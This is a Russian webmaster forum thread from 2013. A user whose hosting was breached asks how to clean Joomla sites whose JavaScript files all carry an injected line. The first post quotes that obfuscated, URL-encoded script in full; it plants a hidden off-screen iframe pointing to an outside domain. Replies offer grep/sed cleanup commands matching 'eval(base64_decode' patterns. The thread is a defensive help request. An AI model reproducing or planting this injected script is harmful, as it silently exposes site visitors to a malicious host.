X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали хостинг, пострадали сайты, Joomla, Что делать, как решать?
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:45; Ответить: topsmiling
Сообщение #1


ёёёёёёёёё ӭ
******

Группа: Active User
Сообщений: 1298
Регистрация: 6.3.2011
Из: ★звёзд★
Поблагодарили: 359 раз
Репутация:   97  


Взломали хостинг. Все сайты на хостинге пострадали.
Все JS файлы изменены и в них добавлена строка следующего содержания:
Развернуть/Свернуть

;document.write(unescape('<script%3E%0A%76%61%72%20%5F%30%78%31%33%65%61%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%41%5C%78%36%46%5C%78%36%44%5C%78%36%43%5C%78%36%31%5C%78%36%41%5C%78%36%31%5C%78%37%36%5C%78%36%31%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%31%33%65%61%5B%31%5D%5D%28%5F%30%78%31%33%65%61%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));


1 сайт = 522 js файла. На большую часть сайтов мне плевать, но 3 из них мне нужны. Итого 1500 js файлов.

Во всех папках добавлен файл. Простой HTML файл с содержанием "Hacked By WildClique , Albanian Hackers".

У меня был бэкап, я дебил его удалил час назад sad.gif

Сайты сами по себе странно обновляются. Идет редирект на какой то сайт бессмысленный, но на сам сайт не переходит.

Редактор в Joomla перестал работать нормально.

Что мне делать? Кто поможет?


--------------------
.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 22:53; Ответить: Vangan
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 325
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 164 раза
Репутация:   42  


может скачать все js файлы и сделать замену вредоносного кода везде, поможет это сделать программа типо Useful File Utilities или аналогичная.

Сообщение отредактировал Vangan - 13.8.2013, 22:54
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:56; Ответить: topsmiling
Сообщение #3


ёёёёёёёёё ӭ
******

Группа: Active User
Сообщений: 1298
Регистрация: 6.3.2011
Из: ★звёзд★
Поблагодарили: 359 раз
Репутация:   97  


Только что обнаружил что перенаправляет на сайт http://jomlajavascript.ru/ . Вот смотрите как он обновляется странно после того как полностью загрузилась страничка.

Vangan, я сделал на одном из сайтов. Не помогло. Сайт все равно обновляется.


--------------------
.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:00; Ответить: Vangan
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 325
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 164 раза
Репутация:   42  


А есть доступ к сайту по SSH?

Может сделать команду

#grep -lr --include=*.php "eval(base64_decode" /pathWebroot | xargs sed -i.bak 's/eval(base64_decode[^;]*;//'
#grep -lr --include=*.php "strrev(" /pathWebroot | xargs sed -i._bak 's/$_ = strrev([^;]*; @$_([^;]*;//'

Правда изменить их под свой вредоносный код, одна команда удалит вхождения, вторая на всякий пожарный сделает "бакуп"

Сообщение отредактировал Vangan - 13.8.2013, 23:03
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 13.8.2013, 23:05; Ответить: LoraDi
Сообщение #5


С Joomla на ты...
*****

Группа: Active User
Сообщений: 836
Регистрация: 11.12.2010
Из: Молдовы
Поблагодарили: 295 раз
Репутация:   73  


Версия движков? (icq в профиле...)

Vangan, смысл… сайты взломаны… со временем эта кака появится ещё раз…

Сообщение отредактировал LoraDi - 13.8.2013, 23:06


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:18; Ответить: Vangan
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 325
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 164 раза
Репутация:   42  


LoraDi, я подумал, что ТС требуется хотя бы востановить работоспособность сайтов, а дальше уже производить меры
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1114 Вчера, 23:36
автор: Nell
Горячая тема (нет новых ответов) Вёрстка, натяжка на WordPress, Joomla, качественно, доступно
53 WhiteIce 23755 12.12.2017, 19:41
автор: WhiteIce
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7331 12.12.2017, 13:37
автор: serg5777
Горячая тема (нет новых ответов) FoxCloud - скидки на хостинг
52 FoxCloud 8571 12.12.2017, 11:11
автор: FoxCloud
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлы> Хостинг для чайников и спецов со сверхскоростным саппортом от HOSTiQ.com.ua
Хостинг, VIP-хостинг, Реселлинг, VPS, Выделенные серверы
45 HOSTiQ 15739 11.12.2017, 18:42
автор: HOSTiQ


 



RSS Текстовая версия Сейчас: 14.12.2017, 8:32
Дизайн